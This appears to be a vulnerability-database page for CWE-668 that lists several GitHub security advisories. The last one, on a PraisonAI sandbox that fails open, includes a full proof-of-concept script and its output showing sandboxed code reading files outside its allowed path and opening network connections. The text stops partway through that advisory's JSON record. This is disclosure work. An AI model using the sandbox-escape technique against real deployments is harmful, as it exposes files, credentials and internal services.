CWE-668
DiscouragedExposure of Resource to Wrong Sphere
Abstraction: Class · Status: Draft
The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
1251 vulnerabilities reference this CWE, most recent first.
GHSA-6FWC-R3W5-C64X
Vulnerability from github – Published: 2022-04-06 00:01 – Updated: 2022-04-13 00:00Policy bypass in COOP in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to bypass iframe sandbox via a crafted HTML page.
{
"affected": [],
"aliases": [
"CVE-2022-0461"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-05T01:15:00Z",
"severity": "MODERATE"
},
"details": "Policy bypass in COOP in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to bypass iframe sandbox via a crafted HTML page.",
"id": "GHSA-6fwc-r3w5-c64x",
"modified": "2022-04-13T00:00:46Z",
"published": "2022-04-06T00:01:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0461"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://crbug.com/1256823"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6G2Q-W5J3-FWH4
Vulnerability from github – Published: 2024-01-31 23:22 – Updated: 2024-01-31 23:22Impact
Containers launched through containerd's CRI implementation (through Kubernetes, crictl, or any other pod/container client that uses the containerd CRI service) that share the same image may receive incorrect environment variables, including values that are defined for other containers. If the affected containers have different security contexts, this may allow sensitive information to be unintentionally shared.
If you are not using containerd’s CRI implementation (through one of the mechanisms described above), you are not vulnerable to this issue.
If you are not launching multiple containers or Kubernetes pods from the same image which have different environment variables, you are not vulnerable to this issue.
If you are not launching multiple containers or Kubernetes pods from the same image in rapid succession, you have reduced likelihood of being vulnerable to this issue
Patches
This vulnerability has been fixed in containerd 1.3.10 and containerd 1.4.4. Users should update to these versions as soon as they are released.
Workarounds
There are no known workarounds.
For more information
If you have any questions or comments about this advisory:
- Open an issue
- Email us at security@containerd.io if you think you’ve found a security bug.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/containerd/containerd"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.4.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/containerd/containerd"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-21334"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-31T23:22:45Z",
"nvd_published_at": "2021-03-10T22:15:00Z",
"severity": "MODERATE"
},
"details": "## Impact\n\nContainers launched through containerd\u0027s CRI implementation (through Kubernetes, crictl, or any other pod/container client that uses the containerd CRI service) that share the same image may receive incorrect environment variables, including values that are defined for other containers. If the affected containers have different security contexts, this may allow sensitive information to be unintentionally shared.\n\nIf you are not using containerd\u2019s CRI implementation (through one of the mechanisms described above), you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image which have different environment variables, you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image in rapid succession, you have reduced likelihood of being vulnerable to this issue\n\n## Patches\n\nThis vulnerability has been fixed in containerd 1.3.10 and containerd 1.4.4. Users should update to these versions as soon as they are released.\n\n## Workarounds\n\nThere are no known workarounds.\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n* [Open an issue](https://github.com/containerd/containerd/issues/new/choose)\n* Email us at security@containerd.io if you think you\u2019ve found a security bug.",
"id": "GHSA-6g2q-w5j3-fwh4",
"modified": "2024-01-31T23:22:45Z",
"published": "2024-01-31T23:22:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21334"
},
{
"type": "WEB",
"url": "https://github.com/containerd/cri/pull/1628"
},
{
"type": "WEB",
"url": "https://github.com/containerd/cri/pull/1629"
},
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/commit/05f951a3781f4f2c1911b05e61c160e9c30eaa8e"
},
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/commit/2d9c8aa4b3f4313982c5c999af57212a1c5d144b"
},
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/commit/cbcb2f57fbe221986f96b552855eb802f63193de"
},
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/releases/tag/v1.3.10"
},
{
"type": "WEB",
"url": "https://github.com/containerd/containerd/releases/tag/v1.4.4"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUE2Z2ZUWBHRU36ZGBD2YSJCYB6ELPXE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QIBPKSX5IOWPM3ZPFB3JVLXWDHSZTTWT"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VTXHA5JOWQRCCUZH7ZQBEYN6KZKJEYSD"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202105-33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "containerd environment variable leak"
}
GHSA-6G3J-MCH3-9577
Vulnerability from github – Published: 2022-05-13 01:03 – Updated: 2022-05-13 01:03Red Hat Satellite 5.6 and earlier does not disable the web interface that is used to create the first user for a satellite, which allows remote attackers to create administrator accounts.
{
"affected": [],
"aliases": [
"CVE-2013-4480"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-11-18T02:55:00Z",
"severity": "HIGH"
},
"details": "Red Hat Satellite 5.6 and earlier does not disable the web interface that is used to create the first user for a satellite, which allows remote attackers to create administrator accounts.",
"id": "GHSA-6g3j-mch3-9577",
"modified": "2022-05-13T01:03:31Z",
"published": "2022-05-13T01:03:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4480"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2013:1513"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2013:1514"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2013-4480"
},
{
"type": "WEB",
"url": "https://access.redhat.com/site/articles/539283"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1024614"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00009.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2013-1513.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2013-1514.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-6H5H-CP2C-8254
Vulnerability from github – Published: 2026-04-28 00:31 – Updated: 2026-04-28 00:31OpenClaw versions 2026.2.19 before 2026.3.31 contain an improper cache isolation vulnerability in the Zalo webhook replay-dedupe mechanism that is shared across authenticated webhook targets. Attackers controlling one authenticated Zalo webhook path in multi-account deployments can suppress legitimate events on different accounts by matching event_name and message_id parameters.
{
"affected": [],
"aliases": [
"CVE-2026-41362"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-28T00:16:25Z",
"severity": "LOW"
},
"details": "OpenClaw versions 2026.2.19 before 2026.3.31 contain an improper cache isolation vulnerability in the Zalo webhook replay-dedupe mechanism that is shared across authenticated webhook targets. Attackers controlling one authenticated Zalo webhook path in multi-account deployments can suppress legitimate events on different accounts by matching event_name and message_id parameters.",
"id": "GHSA-6h5h-cp2c-8254",
"modified": "2026-04-28T00:31:41Z",
"published": "2026-04-28T00:31:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41362"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-dedupe-cache-event-suppression-via-shared-authentication"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-6HJ6-3MCR-FM3H
Vulnerability from github – Published: 2022-06-25 00:00 – Updated: 2022-07-01 00:01IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 209057.
{
"affected": [],
"aliases": [
"CVE-2021-38879"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-24T17:15:00Z",
"severity": "MODERATE"
},
"details": "IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 209057.",
"id": "GHSA-6hj6-3mcr-fm3h",
"modified": "2022-07-01T00:01:10Z",
"published": "2022-06-25T00:00:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38879"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/209057"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6597501"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6JCQ-6546-QRRW
Vulnerability from github – Published: 2026-06-18 14:27 – Updated: 2026-06-18 14:27Summary
praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native() path lets callers configure allowed filesystem paths and network=False.
On systems where the optional sandlock module imports but reports that Landlock is unavailable, SandlockSandbox.execute() and run_command() do not fail closed. They silently fall back to SubprocessSandbox(self.config).
That fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite network=False.
Technical Details
SandboxConfig.native() creates a restricted native policy and records caller-provided writable paths plus the requested network posture:
return cls(
sandbox_type="native",
working_dir=os.getcwd(),
security_policy=SecurityPolicy(
allow_network=network,
allow_file_write=True,
allow_subprocess=True,
allowed_paths=resolved_paths,
),
metadata={"writable_paths": resolved_paths, "network": network},
)
SandlockSandbox builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:
policy = Policy(
fs_readable=allowed_read_paths,
fs_writable=allowed_write_paths,
net_allow_hosts=[] if not limits.network_enabled else None,
max_memory=f"{limits.memory_mb}M",
max_processes=limits.max_processes,
max_open_files=limits.max_open_files,
)
However, both execution paths fail open when Sandlock is unavailable:
if not self.is_available:
logger.warning("Sandlock not available, falling back to subprocess")
from .subprocess import SubprocessSandbox
fallback = SubprocessSandbox(self.config)
return await fallback.execute(code, language, limits, env, working_dir)
SubprocessSandbox.execute() writes the code to a temp file and runs python with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The safe_sandbox_path() checks only protect the read_file(), write_file(), and list_files() helper methods.
Why This Is Not Intended Behavior
The report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:
- PraisonAI's Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks
/etc/passwd, SSH keys, AWS credentials, and unauthorized connections. - The security demo creates
SandboxConfig.native(writable_paths=["./safe_workspace"], network=False)and labels file and network access as blocked operations. - The upstream
sandlockpackage requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection. - PraisonAI's own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.
The bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.
PoV
Run from a PraisonAI source checkout:
python3 poc/pov_poc.py \
--repo /path/to/PraisonAI
The PoV:
- injects a fake
sandlockmodule that imports successfully but reports no usable Landlock support; - configures
SandboxConfig.native(writable_paths=[tenant_a], network=False); - creates
tenant-b-secret.txtoutside the configured path; - starts a localhost TCP listener;
- executes code through
SandlockSandbox.execute().
Observed result on v4.6.58:
{
"child_output": {
"network_reply": "local-ok",
"outside_read": "TENANT_B_CANARY"
},
"configured_network": false,
"outside_path_under_allowed": false,
"sandlock_available": false,
"sandbox_type": "sandlock",
"status": "COMPLETED",
"vulnerable": true
}
This proves both policy boundaries are crossed:
- the file read target is not under the configured allowed path;
- the localhost network connection succeeds even though the native policy was created with
network=False.
Full PoV script:
#!/usr/bin/env python3
"""Local-only PoV for poc.
The PoV simulates a system where the optional ``sandlock`` Python package is
installed but kernel Landlock support is unavailable. That is the exact branch
handled by ``SandlockSandbox.execute()``: it logs a warning and falls back to
``SubprocessSandbox``.
No external network is used. The network control is a localhost TCP listener.
No sensitive host files are read. The filesystem control uses temporary tenant
directories and a canary file outside the configured writable path.
"""
from __future__ import annotations
import argparse
import asyncio
import contextlib
import json
import os
import pathlib
import socket
import sys
import tempfile
import types
from typing import Any
def _repo_paths(repo: pathlib.Path) -> list[str]:
return [
str(repo / "src" / "praisonai"),
str(repo / "src" / "praisonai-agents"),
]
async def _accept_once(server: socket.socket) -> str | None:
loop = asyncio.get_running_loop()
def accept() -> str:
conn, _ = server.accept()
with conn:
data = conn.recv(128)
conn.sendall(b"local-ok")
return data.decode("utf-8", "replace")
with contextlib.suppress(Exception):
return await loop.run_in_executor(None, accept)
return None
async def run_pov(repo: pathlib.Path) -> dict[str, Any]:
sandlock_path = repo / "src" / "praisonai" / "praisonai" / "sandbox" / "sandlock.py"
if not sandlock_path.exists():
return {"repo": str(repo), "has_sandlock": False, "vulnerable": False}
sys.path[:0] = _repo_paths(repo)
# Support both the original v4.5.110 API check and the current v4.6.58 API
# check while forcing the "Sandlock not available" branch.
sys.modules["sandlock"] = types.SimpleNamespace(
is_available=lambda: False,
landlock_abi_version=lambda: 0,
)
from praisonai.sandbox.sandlock import SandlockSandbox
from praisonaiagents.sandbox import ResourceLimits, SandboxConfig
with tempfile.TemporaryDirectory(prefix="poc-") as temp_root:
base = pathlib.Path(temp_root)
# Make the PoV deterministic on systems where "python" is not on PATH.
bindir = base / "bin"
bindir.mkdir()
(bindir / "python").symlink_to(sys.executable)
allowed = base / "tenant-a"
allowed.mkdir()
outside = base / "tenant-b-secret.txt"
outside.write_text("TENANT_B_CANARY", encoding="utf-8")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)
server.settimeout(5)
port = server.getsockname()[1]
config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)
sandbox = SandlockSandbox(config=config)
await sandbox.start()
code = f"""
import json
import socket
result = {{}}
try:
with open({str(outside)!r}, "r") as f:
result["outside_read"] = f.read()
except Exception as exc:
result["outside_read_error"] = type(exc).__name__ + ": " + str(exc)
try:
s = socket.create_connection(("127.0.0.1", {port}), timeout=3)
s.sendall(b"hello")
result["network_reply"] = s.recv(32).decode("utf-8", "replace")
s.close()
except Exception as exc:
result["network_error"] = type(exc).__name__ + ": " + str(exc)
print(json.dumps(result, sort_keys=True))
"""
accept_task = asyncio.create_task(_accept_once(server))
result = await sandbox.execute(
code,
limits=ResourceLimits(
timeout_seconds=10,
memory_mb=512,
max_processes=10,
max_open_files=64,
network_enabled=False,
),
env={"PATH": str(bindir)},
)
accepted_payload = None
with contextlib.suppress(Exception):
accepted_payload = await accept_task
server.close()
await sandbox.stop()
child_output: dict[str, Any] = {}
with contextlib.suppress(Exception):
child_output = json.loads(result.stdout.strip())
vulnerable = (
child_output.get("outside_read") == "TENANT_B_CANARY"
and child_output.get("network_reply") == "local-ok"
)
return {
"repo": str(repo),
"has_sandlock": True,
"sandbox_type": sandbox.sandbox_type,
"sandlock_available": sandbox.is_available,
"configured_allowed_paths": config.security_policy.allowed_paths,
"configured_network": config.security_policy.allow_network,
"outside_path_under_allowed": str(outside).startswith(str(allowed) + os.sep),
"status": getattr(result.status, "name", str(result.status)),
"exit_code": result.exit_code,
"stdout": result.stdout.strip(),
"stderr": result.stderr.strip(),
"error": result.error,
"child_output": child_output,
"accepted_local_payload": accepted_payload,
"vulnerable": vulnerable,
}
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--repo", required=True, type=pathlib.Path)
args = parser.parse_args()
result = asyncio.run(run_pov(args.repo.resolve()))
print(json.dumps(result, indent=2, sort_keys=True))
if result.get("has_sandlock") and not result.get("vulnerable"):
return 1
return 0
if __name__ == "__main__":
raise SystemExit(main())
PoC
The PoV section above contains the local reproduction command, input, and decisive output.
Impact
If a PraisonAI user or service relies on SandlockSandbox / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user's normal filesystem and network access.
Concrete impact includes:
- reading files outside the configured tenant/workspace path;
- reading project files, credentials,
.envfiles, SSH material, or cloud config reachable by the PraisonAI process user; - connecting to loopback or internal services despite
network=False; - moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.
The local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.
Suggested Fix
Fail closed when the requested native sandbox boundary cannot be enforced.
Recommended changes:
- In
SandlockSandbox.execute()andrun_command(), return a failedSandboxResultor raise a clear runtime error whenself.is_availableis false. - If fallback behavior is kept for developer convenience, require an explicit opt-in such as
allow_degraded=Trueorfallback="subprocess"and surface that degraded state in the result metadata. - Do not preserve
sandbox_type == "sandlock"in status metadata when the actual execution backend is subprocess. - Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.
- Add tests that a native policy with
network=Falseand a restricted path cannot read outside-path canaries or connect to a localhost listener. - Document the required kernel/ABI versions and the exact degraded-mode semantics.
Affected Package/Versions
- Repository:
MervinPraison/PraisonAI - Package:
praisonai - Component:
src/praisonai/praisonai/sandbox/sandlock.py - Related config component:
src/praisonai-agents/praisonaiagents/sandbox/config.py - Latest verified release/current head:
v4.6.58,1ad58ca02975ff1398efeda694ea2ab78f20cf3e
Confirmed affected:
v4.5.110 vulnerable
v4.5.120 vulnerable
v4.6.58 vulnerable
current vulnerable
Negative control:
v4.5.109 not affected because SandlockSandbox is absent
Suggested affected range: >= 4.5.110, <= 4.6.58.
No fixed version is known at submission time.
Version Sweep
version has_sandlock sandlock_available status outside_read network_reply vulnerable
praisonai-v4.5.109 false false
praisonai-v4.5.110 true false COMPLETED TENANT_B_CANARY local-ok true
praisonai-v4.6.58 true false COMPLETED TENANT_B_CANARY local-ok true
praisonai-current true false COMPLETED TENANT_B_CANARY local-ok true
GitHub history for sandlock.py shows the backend was introduced in 4ee7d298c89f on 2026-04-01 with "graceful fallback to SubprocessSandbox", then updated in 7ae6c6d19c31 on 2026-04-02 to use the current Landlock ABI check.
Advisory History
Nearby advisories are distinct:
GHSA-r4f2-3m54-pp7q/CVE-2026-34955:SubprocessSandboxshell command escape through4.5.96.GHSA-4mr5-g6f9-cfrh,GHSA-qf73-2hrx-xprp,GHSA-6vh2-h83c-9294:execute_code()Python sandbox escapes.GHSA-ch89-h4r2-c8f8: agent tools workspace escape via symlinks.GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tool workspace fail-open.
This report covers a different root cause: SandlockSandbox / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release v4.6.58, while the older SubprocessSandbox shell escape advisory was fixed at 4.5.97.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "4.5.110"
},
{
"fixed": "4.6.61"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-668",
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:27:19Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n`praisonai.sandbox.SandlockSandbox` is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its `SandboxConfig.native()` path lets callers configure allowed filesystem paths and `network=False`.\n\nOn systems where the optional `sandlock` module imports but reports that Landlock is unavailable, `SandlockSandbox.execute()` and `run_command()` do not fail closed. They silently fall back to `SubprocessSandbox(self.config)`.\n\nThat fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite `network=False`.\n\n## Technical Details\n\n`SandboxConfig.native()` creates a restricted native policy and records caller-provided writable paths plus the requested network posture:\n\n```python\nreturn cls(\n sandbox_type=\"native\",\n working_dir=os.getcwd(),\n security_policy=SecurityPolicy(\n allow_network=network,\n allow_file_write=True,\n allow_subprocess=True,\n allowed_paths=resolved_paths,\n ),\n metadata={\"writable_paths\": resolved_paths, \"network\": network},\n)\n```\n\n`SandlockSandbox` builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:\n\n```python\npolicy = Policy(\n fs_readable=allowed_read_paths,\n fs_writable=allowed_write_paths,\n net_allow_hosts=[] if not limits.network_enabled else None,\n max_memory=f\"{limits.memory_mb}M\",\n max_processes=limits.max_processes,\n max_open_files=limits.max_open_files,\n)\n```\n\nHowever, both execution paths fail open when Sandlock is unavailable:\n\n```python\nif not self.is_available:\n logger.warning(\"Sandlock not available, falling back to subprocess\")\n from .subprocess import SubprocessSandbox\n fallback = SubprocessSandbox(self.config)\n return await fallback.execute(code, language, limits, env, working_dir)\n```\n\n`SubprocessSandbox.execute()` writes the code to a temp file and runs `python` with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The `safe_sandbox_path()` checks only protect the `read_file()`, `write_file()`, and `list_files()` helper methods.\n\n### Why This Is Not Intended Behavior\n\nThe report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:\n\n- PraisonAI\u0027s Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks `/etc/passwd`, SSH keys, AWS credentials, and unauthorized connections.\n- The security demo creates `SandboxConfig.native(writable_paths=[\"./safe_workspace\"], network=False)` and labels file and network access as blocked operations.\n- The upstream `sandlock` package requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection.\n- PraisonAI\u0027s own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.\n\nThe bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.\n\n## PoV\n\nRun from a PraisonAI source checkout:\n\n```bash\npython3 poc/pov_poc.py \\\n --repo /path/to/PraisonAI\n```\n\nThe PoV:\n\n1. injects a fake `sandlock` module that imports successfully but reports no usable Landlock support;\n2. configures `SandboxConfig.native(writable_paths=[tenant_a], network=False)`;\n3. creates `tenant-b-secret.txt` outside the configured path;\n4. starts a localhost TCP listener;\n5. executes code through `SandlockSandbox.execute()`.\n\nObserved result on `v4.6.58`:\n\n```json\n{\n \"child_output\": {\n \"network_reply\": \"local-ok\",\n \"outside_read\": \"TENANT_B_CANARY\"\n },\n \"configured_network\": false,\n \"outside_path_under_allowed\": false,\n \"sandlock_available\": false,\n \"sandbox_type\": \"sandlock\",\n \"status\": \"COMPLETED\",\n \"vulnerable\": true\n}\n```\n\nThis proves both policy boundaries are crossed:\n\n- the file read target is not under the configured allowed path;\n- the localhost network connection succeeds even though the native policy was created with `network=False`.\n\nFull PoV script:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local-only PoV for poc.\n\nThe PoV simulates a system where the optional ``sandlock`` Python package is\ninstalled but kernel Landlock support is unavailable. That is the exact branch\nhandled by ``SandlockSandbox.execute()``: it logs a warning and falls back to\n``SubprocessSandbox``.\n\nNo external network is used. The network control is a localhost TCP listener.\nNo sensitive host files are read. The filesystem control uses temporary tenant\ndirectories and a canary file outside the configured writable path.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport asyncio\nimport contextlib\nimport json\nimport os\nimport pathlib\nimport socket\nimport sys\nimport tempfile\nimport types\nfrom typing import Any\n\ndef _repo_paths(repo: pathlib.Path) -\u003e list[str]:\n return [\n str(repo / \"src\" / \"praisonai\"),\n str(repo / \"src\" / \"praisonai-agents\"),\n ]\n\nasync def _accept_once(server: socket.socket) -\u003e str | None:\n loop = asyncio.get_running_loop()\n\n def accept() -\u003e str:\n conn, _ = server.accept()\n with conn:\n data = conn.recv(128)\n conn.sendall(b\"local-ok\")\n return data.decode(\"utf-8\", \"replace\")\n\n with contextlib.suppress(Exception):\n return await loop.run_in_executor(None, accept)\n return None\n\nasync def run_pov(repo: pathlib.Path) -\u003e dict[str, Any]:\n sandlock_path = repo / \"src\" / \"praisonai\" / \"praisonai\" / \"sandbox\" / \"sandlock.py\"\n if not sandlock_path.exists():\n return {\"repo\": str(repo), \"has_sandlock\": False, \"vulnerable\": False}\n\n sys.path[:0] = _repo_paths(repo)\n\n # Support both the original v4.5.110 API check and the current v4.6.58 API\n # check while forcing the \"Sandlock not available\" branch.\n sys.modules[\"sandlock\"] = types.SimpleNamespace(\n is_available=lambda: False,\n landlock_abi_version=lambda: 0,\n )\n\n from praisonai.sandbox.sandlock import SandlockSandbox\n from praisonaiagents.sandbox import ResourceLimits, SandboxConfig\n\n with tempfile.TemporaryDirectory(prefix=\"poc-\") as temp_root:\n base = pathlib.Path(temp_root)\n\n # Make the PoV deterministic on systems where \"python\" is not on PATH.\n bindir = base / \"bin\"\n bindir.mkdir()\n (bindir / \"python\").symlink_to(sys.executable)\n\n allowed = base / \"tenant-a\"\n allowed.mkdir()\n outside = base / \"tenant-b-secret.txt\"\n outside.write_text(\"TENANT_B_CANARY\", encoding=\"utf-8\")\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((\"127.0.0.1\", 0))\n server.listen(1)\n server.settimeout(5)\n port = server.getsockname()[1]\n\n config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)\n sandbox = SandlockSandbox(config=config)\n await sandbox.start()\n\n code = f\"\"\"\nimport json\nimport socket\n\nresult = {{}}\n\ntry:\n with open({str(outside)!r}, \"r\") as f:\n result[\"outside_read\"] = f.read()\nexcept Exception as exc:\n result[\"outside_read_error\"] = type(exc).__name__ + \": \" + str(exc)\n\ntry:\n s = socket.create_connection((\"127.0.0.1\", {port}), timeout=3)\n s.sendall(b\"hello\")\n result[\"network_reply\"] = s.recv(32).decode(\"utf-8\", \"replace\")\n s.close()\nexcept Exception as exc:\n result[\"network_error\"] = type(exc).__name__ + \": \" + str(exc)\n\nprint(json.dumps(result, sort_keys=True))\n\"\"\"\n\n accept_task = asyncio.create_task(_accept_once(server))\n result = await sandbox.execute(\n code,\n limits=ResourceLimits(\n timeout_seconds=10,\n memory_mb=512,\n max_processes=10,\n max_open_files=64,\n network_enabled=False,\n ),\n env={\"PATH\": str(bindir)},\n )\n\n accepted_payload = None\n with contextlib.suppress(Exception):\n accepted_payload = await accept_task\n\n server.close()\n await sandbox.stop()\n\n child_output: dict[str, Any] = {}\n with contextlib.suppress(Exception):\n child_output = json.loads(result.stdout.strip())\n\n vulnerable = (\n child_output.get(\"outside_read\") == \"TENANT_B_CANARY\"\n and child_output.get(\"network_reply\") == \"local-ok\"\n )\n\n return {\n \"repo\": str(repo),\n \"has_sandlock\": True,\n \"sandbox_type\": sandbox.sandbox_type,\n \"sandlock_available\": sandbox.is_available,\n \"configured_allowed_paths\": config.security_policy.allowed_paths,\n \"configured_network\": config.security_policy.allow_network,\n \"outside_path_under_allowed\": str(outside).startswith(str(allowed) + os.sep),\n \"status\": getattr(result.status, \"name\", str(result.status)),\n \"exit_code\": result.exit_code,\n \"stdout\": result.stdout.strip(),\n \"stderr\": result.stderr.strip(),\n \"error\": result.error,\n \"child_output\": child_output,\n \"accepted_local_payload\": accepted_payload,\n \"vulnerable\": vulnerable,\n }\n\ndef main() -\u003e int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--repo\", required=True, type=pathlib.Path)\n args = parser.parse_args()\n\n result = asyncio.run(run_pov(args.repo.resolve()))\n print(json.dumps(result, indent=2, sort_keys=True))\n\n if result.get(\"has_sandlock\") and not 